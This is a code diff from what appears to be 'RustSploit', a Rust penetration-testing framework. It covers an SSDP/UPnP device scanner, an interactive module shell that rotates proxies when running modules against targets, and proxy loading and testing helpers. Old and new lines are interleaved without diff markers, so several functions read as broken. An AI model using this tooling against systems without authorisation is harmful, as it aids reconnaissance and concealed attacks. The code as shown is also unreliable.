eprintln!(" {} Error: {}", "[!]".yellow(), e);
}
}
}
// Small delay between retries
if attempt < retries {
tokio::time::sleep(Duration::from_millis(500)).await;
}
}
}
if !found_any {
println!("{}", "[-] Target did not respond to any M-SEARCH requests".yellow());
}
Ok(())
}
async fn send_ssdp_request(
target: &str,
port: u16,
st: &SearchTarget,
timeout: Duration,
verbose: bool,
) -> Result<Option<String>> {
let local_bind: SocketAddr = "0.0.0.0:0".parse()
.context("Failed to parse local bind address")?;
let socket = UdpSocket::bind(local_bind).await
.context("Failed to bind UDP socket")?;
let remote_addr: SocketAddr = format!("{}:{}", target, port).parse()
.with_context(|| format!("Failed to parse remote address {}:{}", target, port))?;
socket.connect(&remote_addr).await
.with_context(|| format!("Failed to connect to {}:{}", target, port))?;
let local_bind: SocketAddr = "0.0.0.0:0".parse()?;
let socket = UdpSocket::bind(local_bind).await?;
socket.connect(&addr).await?;
let request = format!(
"M-SEARCH * HTTP/1.1\r\n\
HOST: {}:{}\r\n\
MAN: \"ssdp:discover\"\r\n\
MX: {}\r\n\
ST: {}\r\n\
USER-AGENT: RustSploit/1.0\r\n\r\n",
target,
port,
timeout.as_secs().max(1),
st.st_header()
MX: 2\r\n\
ST: upnp:rootdevice\r\n\r\n",
target, port
);
if verbose {
println!(" [*] Sending request:\n{}", request.dimmed());
}
socket.send(request.as_bytes()).await?;
socket.send(request.as_bytes()).await
.context("Failed to send SSDP request")?;
let mut buf = vec![0u8; 4096]; // Increased buffer size for larger responses
match tokio_timeout(timeout, socket.recv(&mut buf)).await {
let mut buf = vec![0u8; 2048];
match timeout(Duration::from_secs(3), socket.recv(&mut buf)).await {
Ok(Ok(size)) => {
let response = String::from_utf8_lossy(&buf[..size]).to_string();
Ok(Some(response))
let response = String::from_utf8_lossy(&buf[..size]);
parse_ssdp_response(&response, &target, port);
}
_ => {
println!("[-] Target did not respond to M-SEARCH request");
}
Ok(Err(e)) => Err(anyhow::anyhow!("Failed to receive response: {}", e)),
Err(_) => Ok(None), // Timeout
}
Ok(())
}
/// Normalize the target: IPv6 -> [ipv6]:port, IPv4 stays as ipv4:port
@@ -163,10 +67,9 @@ fn clean_ipv6_brackets(ip: &str) -> String {
/// Ask user for port (optional), fallback to 1900 if empty
fn prompt_port() -> Option<u16> {
print!("{}", "[*] Enter custom port (default 1900): ".cyan().bold());
std::io::stdout().flush().ok();
println!("[*] Enter custom port (default 1900): ");
let mut input = String::new();
if std::io::stdin().read_line(&mut input).is_ok() {
if let Ok(_) = std::io::stdin().read_line(&mut input) {
let input = input.trim();
if input.is_empty() {
return None;
@@ -178,119 +81,11 @@ fn prompt_port() -> Option<u16> {
None
}
/// Ask user for timeout in seconds
fn prompt_timeout() -> Option<u64> {
print!("{}", "[*] Enter timeout in seconds (default 3): ".cyan().bold());
std::io::stdout().flush().ok();
let mut input = String::new();
if std::io::stdin().read_line(&mut input).is_ok() {
let input = input.trim();
if input.is_empty() {
return None;
}
if let Ok(t) = input.parse::<u64>() {
if t > 0 && t <= 60 {
return Some(t);
}
}
}
None
}
/// Ask user for number of retries
fn prompt_retries() -> Option<u32> {
print!("{}", "[*] Enter number of retries (default 1): ".cyan().bold());
std::io::stdout().flush().ok();
let mut input = String::new();
if std::io::stdin().read_line(&mut input).is_ok() {
let input = input.trim();
if input.is_empty() {
return None;
}
if let Ok(r) = input.parse::<u32>() {
if r > 0 && r <= 10 {
return Some(r);
}
}
}
None
}
/// Ask user for verbose mode
fn prompt_verbose() -> Option<bool> {
print!("{}", "[*] Verbose output? [y/N]: ".cyan().bold());
std::io::stdout().flush().ok();
let mut input = String::new();
if std::io::stdin().read_line(&mut input).is_ok() {
let input = input.trim().to_lowercase();
match input.as_str() {
"y" | "yes" => return Some(true),
"n" | "no" | "" => return Some(false),
_ => {}
}
}
None
}
/// Ask user for search targets
fn prompt_search_targets() -> Result<Vec<SearchTarget>> {
let mut targets = Vec::new();
println!("{}", "[*] Select SSDP Search Targets:".cyan().bold());
println!(" 1. upnp:rootdevice (default)");
println!(" 2. ssdp:all");
println!(" 3. Custom ST");
println!(" 4. All of the above");
print!("{}", "Enter choice [1-4, default 1]: ".cyan().bold());
std::io::stdout().flush().ok();
let mut input = String::new();
std::io::stdin().read_line(&mut input).ok();
match input.trim() {
"1" | "" => {
targets.push(SearchTarget::RootDevice);
}
"2" => {
targets.push(SearchTarget::All);
}
"3" => {
print!("{}", "Enter custom ST: ".cyan().bold());
std::io::stdout().flush().ok();
let mut st_input = String::new();
std::io::stdin().read_line(&mut st_input).ok();
let st = st_input.trim().to_string();
if !st.is_empty() {
targets.push(SearchTarget::Custom(st));
} else {
targets.push(SearchTarget::RootDevice);
}
}
"4" => {
targets.push(SearchTarget::RootDevice);
targets.push(SearchTarget::All);
}
_ => {
targets.push(SearchTarget::RootDevice);
}
}
if targets.is_empty() {
targets.push(SearchTarget::RootDevice);
}
Ok(targets)
}
fn parse_ssdp_response(response: &str, target_ip: &str, port: u16, st: &str) {
fn parse_ssdp_response(response: &str, target_ip: &str, port: u16) {
let regexps = vec![
("server", r"(?i)Server:\s*(.*?)\r\n"),
("location", r"(?i)Location:\s*(.*?)\r\n"),
("usn", r"(?i)USN:\s*(.*?)\r\n"),
("st", r"(?i)ST:\s*(.*?)\r\n"),
("nt", r"(?i)NT:\s*(.*?)\r\n"),
("cache-control", r"(?i)Cache-Control:\s*(.*?)\r\n"),
("ext", r"(?i)EXT:\s*(.*?)\r\n"),
];
let mut results: HashMap<&str, String> = HashMap::new();
@@ -298,47 +93,19 @@ fn parse_ssdp_response(response: &str, target_ip: &str, port: u16, st: &str) {
for (key, pattern) in regexps {
if let Ok(re) = Regex::new(pattern) {
if let Some(caps) = re.captures(response) {
let value = caps.get(1)
.map(|m| m.as_str().trim())
.unwrap_or("")
.to_string();
results.insert(key, value);
results.insert(key, caps.get(1).map(|m| m.as_str()).unwrap_or("").to_string());
} else {
results.insert(key, String::new());
results.insert(key, String::from(""));
}
}
}
// Check HTTP status
let status_line = response.lines().next().unwrap_or("");
let status_ok = status_line.contains("200") || status_line.contains("HTTP/1.1");
if status_ok {
println!(
"{}",
format!(
"[+] {}:{} | ST: {} | Server: {} | Location: {} | USN: {}",
target_ip,
port,
results.get("st").or(results.get("nt")).unwrap_or(&st.to_string()),
results.get("server").unwrap_or(&String::new()),
results.get("location").unwrap_or(&String::new()),
results.get("usn").unwrap_or(&String::new())
)
.green()
);
// Show additional headers if present
if let Some(cache) = results.get("cache-control") {
if !cache.is_empty() {
println!(" {} Cache-Control: {}", " |".dimmed(), cache.dimmed());
}
}
} else {
println!(
"{}",
format!("[!] {}:{} | Unexpected response: {}", target_ip, port, status_line)
.yellow()
);
}
println!(
"[+] {}:{} | {} | {} | {}",
target_ip,
port,
results.get("server").unwrap_or(&"".to_string()),
results.get("location").unwrap_or(&"".to_string()),
results.get("usn").unwrap_or(&"".to_string())
);
}
+139 -478
View File
@@ -1,16 +1,11 @@
use crate::commands;
use crate::utils;
use anyhow::Result;
use colored::*;
use rand::prelude::*; // rand 0.9 prelude provides rng() and SliceRandom
use std::env;
use std::io::{self, Write};
use std::collections::HashSet;
const MAX_INPUT_LENGTH: usize = 4096;
const MAX_PROXY_LIST_SIZE: usize = 10_000;
const MAX_TARGET_LENGTH: usize = 512;
/// Simple interactive shell context
struct ShellContext {
current_module: Option<String>,
@@ -37,252 +32,154 @@ pub async fn interactive_shell() -> Result<()> {
let mut ctx = ShellContext::new();
loop {
print!("{}", "rsf> ".cyan().bold());
print!("rsf> ");
io::stdout().flush()?;
let mut raw_input = String::new();
io::stdin().read_line(&mut raw_input)?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let input = input.trim();
if raw_input.len() > MAX_INPUT_LENGTH {
println!(
"{}",
format!(
"[!] Input length exceeds {} characters and was ignored.",
MAX_INPUT_LENGTH
)
.yellow()
);
continue;
}
let trimmed = raw_input.trim();
if trimmed.is_empty() {
if input.is_empty() {
continue;
}
match split_command(trimmed) {
Some((cmd, rest)) => {
let command_key = resolve_command(&cmd);
match command_key.as_str() {
"exit" => {
println!("Exiting...");
clear_proxy_env_vars();
break;
match input {
"exit" | "quit" => {
println!("Exiting...");
break;
},
"help" => {
println!("Available commands:");
println!(" use <module_path> - Select a module (e.g. 'use exploits/sample_exploit')");
println!(" set target <value> - Set the target IP/host");
println!(" run - Run the current module (with proxy retries if enabled)");
println!(" modules - List available modules");
println!(" find <keyword> - Search for a module by keyword");
println!(" proxy_load <file> - Load a list of proxies (http://ip:port, https://ip:port, socks4://ip:port, socks5://ip:port.)");
println!(" proxy_on - Enable proxy usage");
println!(" proxy_off - Disable proxy usage");
println!(" show_proxies - Show loaded proxies & current proxy status");
println!(" exit, quit - Exit the shell");
},
"modules" => {
utils::list_all_modules();
},
cmd if cmd.starts_with("find ") => {
let keyword = cmd.trim_start_matches("find ").trim();
if keyword.is_empty() {
println!("Usage: find <keyword>");
} else {
utils::find_modules(keyword);
}
},
cmd if cmd.starts_with("proxy_load ") => {
let file = cmd.trim_start_matches("proxy_load ").trim();
match utils::load_proxies_from_file(file) {
Ok(list) => {
ctx.proxy_list = list;
println!("Loaded {} proxies from '{}'.", ctx.proxy_list.len(), file);
}
"help" => render_help(),
"modules" => utils::list_all_modules(),
"find" => {
if rest.is_empty() {
println!("{}", "Usage: find <keyword>".yellow());
} else {
utils::find_modules(&rest);
}
}
"proxy_load" => {
let file_path = if rest.is_empty() {
prompt_for_path("Path to proxy list file: ")?
} else {
rest.to_string()
};
match utils::load_proxies_from_file(&file_path) {
Ok(summary) => {
let mut unique = HashSet::new();
let mut deduped = Vec::new();
for proxy in summary.proxies.iter() {
if unique.insert(proxy.clone()) {
deduped.push(proxy.clone());
}
}
if deduped.len() > MAX_PROXY_LIST_SIZE {
println!(
"{}",
format!(
"[!] Loaded proxy list exceeded {} entries. Truncating.",
MAX_PROXY_LIST_SIZE
)
.yellow()
);
deduped.truncate(MAX_PROXY_LIST_SIZE);
}
let removed = summary.proxies.len().saturating_sub(deduped.len());
if removed > 0 {
println!(
"{}",
format!(
"[*] Removed {} duplicate proxy entr{}.",
removed,
if removed == 1 { "y" } else { "ies" }
)
.dimmed()
);
}
ctx.proxy_list = deduped;
println!(
"Loaded {} proxies from '{}'.",
ctx.proxy_list.len(),
file_path
);
if !summary.skipped.is_empty() {
println!(
"{}",
format!(
"Skipped {} invalid entr{}:",
summary.skipped.len(),
if summary.skipped.len() == 1 { "y" } else { "ies" }
)
.yellow()
);
for failure in summary.skipped.iter().take(10) {
println!(
" [line {}] {} ({})",
failure.line_number,
failure.content,
failure.reason
);
}
if summary.skipped.len() > 10 {
println!(
" ... {} additional entr{} skipped.",
summary.skipped.len() - 10,
if summary.skipped.len() - 10 == 1 {
"y"
} else {
"ies"
}
);
}
}
if prompt_yes_no("Test connectivity of loaded proxies? (recommended)", true)? {
test_current_proxies(&mut ctx).await?;
}
}
Err(e) => {
println!("Failed to load proxies: {}", e);
}
}
}
"proxy_on" => {
ctx.proxy_enabled = true;
println!("Proxy usage enabled.");
}
"proxy_off" => {
ctx.proxy_enabled = false;
println!("Proxy usage disabled.");
clear_proxy_env_vars();
}
"proxy_test" => {
test_current_proxies(&mut ctx).await?;
}
"show_proxies" => {
if ctx.proxy_list.is_empty() {
println!("No proxies loaded. Use 'proxy_load <file>' to load them.");
} else {
println!("Loaded proxies ({}):", ctx.proxy_list.len());
for p in &ctx.proxy_list {
println!(" {}", p);
}
}
println!("Proxy is currently {}.", if ctx.proxy_enabled { "ON" } else { "OFF" });
}
"use" => {
if rest.is_empty() {
println!("{}", "Usage: use <module_path>".yellow());
} else if let Some(safe_path) = sanitize_module_path(&rest) {
if utils::module_exists(&safe_path) {
ctx.current_module = Some(safe_path.clone());
println!("{}", format!("Module '{}' selected.", safe_path).green());
} else {
println!("{}", format!("Module '{}' not found.", rest).red());
}
} else {
println!(
"{}",
"Module path contains invalid characters or traversal attempts."
.red()
);
}
}
"set" => {
if let Some(raw_value) = rest.strip_prefix("target").map(|s| s.trim()) {
match sanitize_target(raw_value) {
Ok(valid_target) => {
ctx.current_target = Some(valid_target.clone());
println!("{}", format!("Target set to {}", valid_target).green());
}
Err(reason) => {
println!("{}", format!("[!] {}", reason).yellow());
}
}
} else {
println!("{}", "Usage: set target <value>".yellow());
}
}
"run" => {
if let Some(ref module_path) = ctx.current_module {
if let Some(ref t) = ctx.current_target {
if ctx.proxy_enabled && !ctx.proxy_list.is_empty() {
let mut tried_proxies = HashSet::new();
let mut success = false;
while tried_proxies.len() < ctx.proxy_list.len() {
let chosen_proxy = pick_random_untried_proxy(&ctx.proxy_list, &tried_proxies);
set_all_proxy_env(&chosen_proxy);
println!("[*] Using proxy: {}", chosen_proxy);
println!("Running module '{}' against target '{}'", module_path, t);
match commands::run_module(module_path, t).await {
Ok(_) => {
success = true;
break;
}
Err(e) => {
eprintln!("[!] Module failed with error: {:?}", e);
eprintln!(" Retrying with a new proxy...");
tried_proxies.insert(chosen_proxy);
}
}
}
if !success {
println!("[!] All proxies failed. Trying direct connection...");
clear_proxy_env_vars();
if let Err(e) = commands::run_module(module_path, t).await {
eprintln!("[!] Final direct attempt also failed: {:?}", e);
}
}
} else if ctx.proxy_enabled && ctx.proxy_list.is_empty() {
println!("[!] No proxies loaded, but proxy is ON. Doing direct attempt...");
clear_proxy_env_vars();
if let Err(e) = commands::run_module(module_path, t).await {
eprintln!("[!] Module failed: {:?}", e);
}
} else {
clear_proxy_env_vars();
if let Err(e) = commands::run_module(module_path, t).await {
eprintln!("[!] Module failed: {:?}", e);
}
}
} else {
println!("{}", "No target set. Use 'set target <value>' first.".yellow());
}
} else {
println!("{}", "No module selected. Use 'use <module>' first.".yellow());
}
}
_ => {
println!("{}", format!("Unknown command: '{}'. Type 'help' or '?' for usage.", trimmed).red());
Err(e) => {
println!("Failed to load proxies: {}", e);
}
}
}
None => {
println!("{}", format!("Unknown command: '{}'. Type 'help' or '?' for usage.", trimmed).red());
}
},
"proxy_on" => {
ctx.proxy_enabled = true;
println!("Proxy usage enabled.");
},
"proxy_off" => {
ctx.proxy_enabled = false;
println!("Proxy usage disabled.");
clear_proxy_env_vars();
},
"show_proxies" => {
if ctx.proxy_list.is_empty() {
println!("No proxies loaded. Use 'proxy_load <file>' to load them.");
} else {
println!("Loaded proxies ({}):", ctx.proxy_list.len());
for p in &ctx.proxy_list {
println!(" {}", p);
}
}
println!("Proxy is currently {}.", if ctx.proxy_enabled { "ON" } else { "OFF" });
},
cmd if cmd.starts_with("use ") => {
let module_path = cmd.trim_start_matches("use ").trim();
if utils::module_exists(module_path) {
ctx.current_module = Some(module_path.to_string());
println!("Module '{}' selected.", module_path);
} else {
println!("Module '{}' not found.", module_path);
}
},
cmd if cmd.starts_with("set ") => {
let parts: Vec<&str> = cmd.split_whitespace().collect();
if parts.len() >= 3 && parts[1] == "target" {
ctx.current_target = Some(parts[2].to_string());
println!("Target set to {}", parts[2]);
} else {
println!("Usage: set target <value>");
}
},
"run" => {
if let Some(ref module_path) = ctx.current_module {
if let Some(ref t) = ctx.current_target {
// -----------------------------
// NEW: Proxy Retry Logic
// -----------------------------
if ctx.proxy_enabled && !ctx.proxy_list.is_empty() {
let mut tried_proxies = HashSet::new();
let mut success = false;
while tried_proxies.len() < ctx.proxy_list.len() {
let chosen_proxy = pick_random_untried_proxy(&ctx.proxy_list, &tried_proxies);
set_all_proxy_env(&chosen_proxy);
println!("[*] Using proxy: {}", chosen_proxy);
println!("Running module '{}' against target '{}'", module_path, t);
match commands::run_module(module_path, t).await {
Ok(_) => {
success = true;
break;
}
Err(e) => {
eprintln!("[!] Module failed with error: {:?}", e);
eprintln!(" Retrying with a new proxy...");
tried_proxies.insert(chosen_proxy);
}
}
}
if !success {
println!("[!] All proxies failed. Trying direct connection...");
clear_proxy_env_vars();
if let Err(e) = commands::run_module(module_path, t).await {
eprintln!("[!] Final direct attempt also failed: {:?}", e);
}
}
} else if ctx.proxy_enabled && ctx.proxy_list.is_empty() {
println!("[!] No proxies loaded, but proxy is ON. Doing direct attempt...");
clear_proxy_env_vars();
if let Err(e) = commands::run_module(module_path, t).await {
eprintln!("[!] Module failed: {:?}", e);
}
} else {
clear_proxy_env_vars();
if let Err(e) = commands::run_module(module_path, t).await {
eprintln!("[!] Module failed: {:?}", e);
}
}
} else {
println!("No target set. Use 'set target <value>' first.");
}
} else {
println!("No module selected. Use 'use <module>' first.");
}
},
_ => {
println!("Unknown command: '{}'. Type 'help' for usage.", input);
},
}
}
@@ -315,239 +212,3 @@ fn clear_proxy_env_vars() {
env::remove_var("HTTP_PROXY");
env::remove_var("HTTPS_PROXY");
}
fn split_command(input: &str) -> Option<(String, String)> {
let mut parts = input.splitn(2, char::is_whitespace);
let cmd = parts.next()?.to_lowercase();
let rest = parts.next().unwrap_or("").trim().to_string();
Some((cmd, rest))
}
fn resolve_command(cmd: &str) -> String {
match cmd {
"?" | "help" | "h" => "help",
"modules" | "list" | "ls" | "m" => "modules",
"find" | "search" | "f" | "f1" => "find",
"proxy_load" | "proxyload" | "pl" | "load_proxy" | "loadproxies" => "proxy_load",
"proxy_on" | "pon" | "proxyon" => "proxy_on",
"proxy_off" | "poff" | "proxyoff" => "proxy_off",
"proxy_test" | "ptest" | "proxycheck" | "check_proxies" => "proxy_test",
"show_proxies" | "proxies" | "pshow" | "proxy_show" => "show_proxies",
"use" | "u" => "use",
"set" | "target" => "set",
"run" | "go" | "exec" => "run",
"exit" | "quit" | "q" => "exit",
other => other,
}
.to_string()
}
fn sanitize_module_path(input: &str) -> Option<String> {
let trimmed = input.trim();
if trimmed.is_empty() {
return None;
}
if trimmed.contains("..") || trimmed.contains('\\') {
return None;
}
let valid = trimmed.chars().all(|c| {
matches!(
c,
'a'..='z'
| 'A'..='Z'
| '0'..='9'
| '/'
| '_'
)
});
if valid {
Some(trimmed.to_string())
} else {
None
}
}
fn sanitize_target(input: &str) -> std::result::Result<String, &'static str> {
let trimmed = input.trim();
if trimmed.is_empty() {
return Err("Target cannot be empty.");
}
if trimmed.len() > MAX_TARGET_LENGTH {
return Err("Target value is too long.");
}
if trimmed.chars().any(|c| c.is_control() || c.is_whitespace()) {
return Err("Target cannot contain whitespace or control characters.");
}
Ok(trimmed.to_string())
}
fn render_help() {
println!();
println!("{}", "RustSploit Command Palette".bold().underline());
println!(
"{}",
"Shortcuts are case-insensitive. Example: `f1 ssh` searches for SSH modules."
.dimmed()
);
println!();
let entries = vec![
("help", "help | h | ?", "Show this screen"),
("modules", "modules | ls | m", "List available modules"),
("find", "find <kw> | f1 <kw>", "Search modules by keyword"),
("use", "use <path> | u <path>", "Select a module to run"),
("set target", "set target <value>", "Set current target host/IP"),
("run", "run | go", "Execute selected module (with proxy rotation)"),
("proxy_load", "proxy_load [file] | pl", "Load proxy list from file"),
("proxy_on", "proxy_on | pon", "Enable proxy usage"),
("proxy_off", "proxy_off | poff", "Disable proxy usage"),
("proxy_test", "proxy_test | ptest", "Validate loaded proxies"),
("show_proxies", "show_proxies | proxies", "Display proxy status"),
("exit", "exit | quit | q", "Leave the shell"),
];
println!("{}", format!("{:<16} {:<25} {}", "Command", "Shortcuts", "Description").bold());
println!("{}", "-".repeat(72).dimmed());
for (cmd, shortcuts, desc) in entries {
println!("{:<16} {:<25} {}", cmd.green(), shortcuts.cyan(), desc);
}
println!();
println!(
"{}",
"Need more context? Try `modules`, then `use category/module_name`, and finally `run`."
.dimmed()
);
println!();
}
async fn test_current_proxies(ctx: &mut ShellContext) -> Result<()> {
if ctx.proxy_list.is_empty() {
println!("No proxies loaded to test.");
return Ok(());
}
let total = ctx.proxy_list.len();
let test_url = prompt_string_default("Proxy test URL", "https://example.com")?;
let timeout_secs = prompt_u64("Proxy test timeout (seconds)", 5)?;
let max_parallel = prompt_usize("Max concurrent proxy tests", 10)?;
println!(
"[*] Testing {} proxy entr{} (timeout: {}s, concurrency: {})",
total,
if total == 1 { "y" } else { "ies" },
timeout_secs,
max_parallel
);
let summary = utils::test_proxies(&ctx.proxy_list, &test_url, timeout_secs, max_parallel).await;
let working_count = summary.working.len();
let failed = summary.failed;
let working = summary.working;
if working_count == 0 {
println!("{}", "[-] No proxies passed the connectivity test.".red());
} else {
println!(
"{}",
format!("[+] {} proxies passed the connectivity test.", working_count).green()
);
}
if !failed.is_empty() {
println!(
"{}",
format!("[-] {} proxies failed validation:", failed.len()).yellow()
);
for failure in &failed {
println!(" {} -> {}", failure.proxy, failure.reason);
}
}
ctx.proxy_list = working;
if ctx.proxy_enabled && ctx.proxy_list.is_empty() {
println!("[!] Proxy list is empty after testing. Disabling proxy usage.");
ctx.proxy_enabled = false;
clear_proxy_env_vars();
}
Ok(())
}
fn prompt_for_path(message: &str) -> io::Result<String> {
loop {
print!("{}", message);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let value = input.trim();
if !value.is_empty() {
return Ok(value.to_string());
}
println!("Path cannot be empty. Please try again.");
}
}
fn prompt_string_default(message: &str, default: &str) -> io::Result<String> {
print!("{} [{}]: ", message, default);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim();
if trimmed.is_empty() {
Ok(default.to_string())
} else {
Ok(trimmed.to_string())
}
}
fn prompt_yes_no(message: &str, default_yes: bool) -> io::Result<bool> {
let default_hint = if default_yes { "Y/n" } else { "y/N" };
loop {
print!("{} [{}]: ", message, default_hint);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim().to_lowercase();
match trimmed.as_str() {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("Please answer with 'y' or 'n'."),
}
}
}
fn prompt_u64(message: &str, default: u64) -> io::Result<u64> {
loop {
print!("{} [{}]: ", message, default);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim();
if trimmed.is_empty() {
return Ok(default);
}
match trimmed.parse::<u64>() {
Ok(value) => return Ok(value),
Err(_) => println!("Invalid number. Please enter a positive integer."),
}
}
}
fn prompt_usize(message: &str, default: usize) -> io::Result<usize> {
loop {
print!("{} [{}]: ", message, default);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim();
if trimmed.is_empty() {
return Ok(default);
}
match trimmed.parse::<usize>() {
Ok(value) if value > 0 => return Ok(value),
_ => println!("Invalid number. Please enter a positive integer."),
}
}
}
-1
View File
@@ -1 +0,0 @@
+20 -171
View File
@@ -2,15 +2,9 @@
use colored::*;
use std::fs;
use std::io::{BufRead, BufReader};
use std::io::{BufRead, BufReader, Error};
use std::path::Path;
use std::sync::Arc;
use std::time::Duration;
use anyhow::{Result, anyhow, Context};
use futures::stream::{FuturesUnordered, StreamExt};
use reqwest;
use tokio::sync::Semaphore;
use url::Url;
use anyhow::{Result};
/// Maximum folder depth to traverse
const MAX_DEPTH: usize = 6;
@@ -140,177 +134,32 @@ pub fn find_modules(keyword: &str) {
}
}
const SUPPORTED_PROXY_SCHEMES: &[&str] = &["http", "https", "socks4", "socks4a", "socks5", "socks5h"];
#[derive(Debug, Clone)]
pub struct ProxyParseError {
pub line_number: usize,
pub content: String,
pub reason: String,
}
#[derive(Debug, Clone)]
pub struct ProxyLoadSummary {
pub proxies: Vec<String>,
pub skipped: Vec<ProxyParseError>,
}
#[derive(Debug, Clone)]
pub struct ProxyTestFailure {
pub proxy: String,
pub reason: String,
}
#[derive(Debug, Clone)]
pub struct ProxyTestSummary {
pub working: Vec<String>,
pub failed: Vec<ProxyTestFailure>,
}
/// Attempt to normalise and validate a proxy entry.
fn normalize_proxy_candidate(line: &str) -> Result<String> {
let trimmed = line.trim();
if trimmed.is_empty() {
return Err(anyhow!("empty line"));
}
let candidate = if trimmed.contains("://") {
trimmed.to_string()
/// Parses a single proxy line (unchanged)
fn parse_proxy_line(line: &str) -> String {
let trimmed = line.trim().to_lowercase();
if trimmed.starts_with("http://")
|| trimmed.starts_with("https://")
|| trimmed.starts_with("socks4://")
|| trimmed.starts_with("socks5://")
{
line.to_string()
} else {
format!("http://{}", trimmed)
};
let url = Url::parse(&candidate).map_err(|e| anyhow!("invalid proxy syntax: {}", e))?;
if !SUPPORTED_PROXY_SCHEMES.iter().any(|scheme| url.scheme() == *scheme) {
return Err(anyhow!("unsupported proxy scheme '{}'", url.scheme()));
format!("http://{}", line)
}
if url.host_str().is_none() {
return Err(anyhow!("missing proxy host"));
}
if url.port().is_none() {
return Err(anyhow!("missing proxy port"));
}
Ok(candidate)
}
/// Load proxies from a file, returning a summary containing valid proxies and skipped entries.
pub fn load_proxies_from_file(filename: &str) -> Result<ProxyLoadSummary> {
let file = fs::File::open(filename)
.with_context(|| format!("failed to open proxy file '{}'", filename))?;
/// Load proxies from a file, returning normalized proxy URLs (unchanged)
pub fn load_proxies_from_file(filename: &str) -> Result<Vec<String>, Error> {
let file = fs::File::open(filename)?;
let reader = BufReader::new(file);
let mut proxies = Vec::new();
let mut skipped = Vec::new();
for (idx, line_res) in reader.lines().enumerate() {
let raw_line = line_res
.with_context(|| format!("failed to read line {} in '{}'", idx + 1, filename))?;
let trimmed = raw_line.trim();
if trimmed.is_empty() || trimmed.starts_with('#') || trimmed.starts_with("//") {
continue;
}
match normalize_proxy_candidate(trimmed) {
Ok(proxy) => proxies.push(proxy),
Err(err) => skipped.push(ProxyParseError {
line_number: idx + 1,
content: trimmed.to_string(),
reason: err.to_string(),
}),
for line in reader.lines() {
let line = line?.trim().to_string();
if !line.is_empty() {
proxies.push(parse_proxy_line(&line));
}
}
if proxies.is_empty() {
return Err(anyhow!("no valid proxies found in '{}'", filename));
}
Ok(ProxyLoadSummary { proxies, skipped })
}
/// Test proxies concurrently and return which passed connectivity checks.
pub async fn test_proxies(
proxies: &[String],
test_url: &str,
timeout_secs: u64,
max_parallel: usize,
) -> ProxyTestSummary {
if proxies.is_empty() {
return ProxyTestSummary {
working: Vec::new(),
failed: Vec::new(),
};
}
let timeout = Duration::from_secs(timeout_secs.max(1));
let parallel = max_parallel.max(1);
let semaphore = Arc::new(Semaphore::new(parallel));
let mut tasks = FuturesUnordered::new();
for proxy in proxies.iter().cloned() {
let test_url = test_url.to_string();
let semaphore = Arc::clone(&semaphore);
tasks.push(tokio::spawn(async move {
let permit = semaphore.acquire_owned().await;
if permit.is_err() {
return (proxy, Err(anyhow!("failed to acquire semaphore permit")));
}
let _permit = permit.unwrap();
let result = check_proxy(&proxy, &test_url, timeout).await;
(proxy, result)
}));
}
let mut summary = ProxyTestSummary {
working: Vec::new(),
failed: Vec::new(),
};
while let Some(res) = tasks.next().await {
match res {
Ok((proxy, Ok(()))) => summary.working.push(proxy),
Ok((proxy, Err(err))) => summary.failed.push(ProxyTestFailure {
proxy,
reason: err.to_string(),
}),
Err(join_err) => summary.failed.push(ProxyTestFailure {
proxy: "<spawn failed>".to_string(),
reason: join_err.to_string(),
}),
}
}
summary
}
async fn check_proxy(proxy: &str, test_url: &str, timeout: Duration) -> Result<()> {
let proxy_cfg = reqwest::Proxy::all(proxy)
.with_context(|| format!("invalid proxy '{}'", proxy))?;
let client = reqwest::Client::builder()
.timeout(timeout)
.proxy(proxy_cfg)
.danger_accept_invalid_certs(true)
.build()
.context("failed to build reqwest client")?;
let response = client
.get(test_url)
.send()
.await
.with_context(|| format!("request via proxy '{}' failed", proxy))?;
if !response.status().is_success() {
return Err(anyhow!(
"received HTTP status {} while hitting {}",
response.status(),
test_url
));
}
Ok(())
Ok(proxies)
}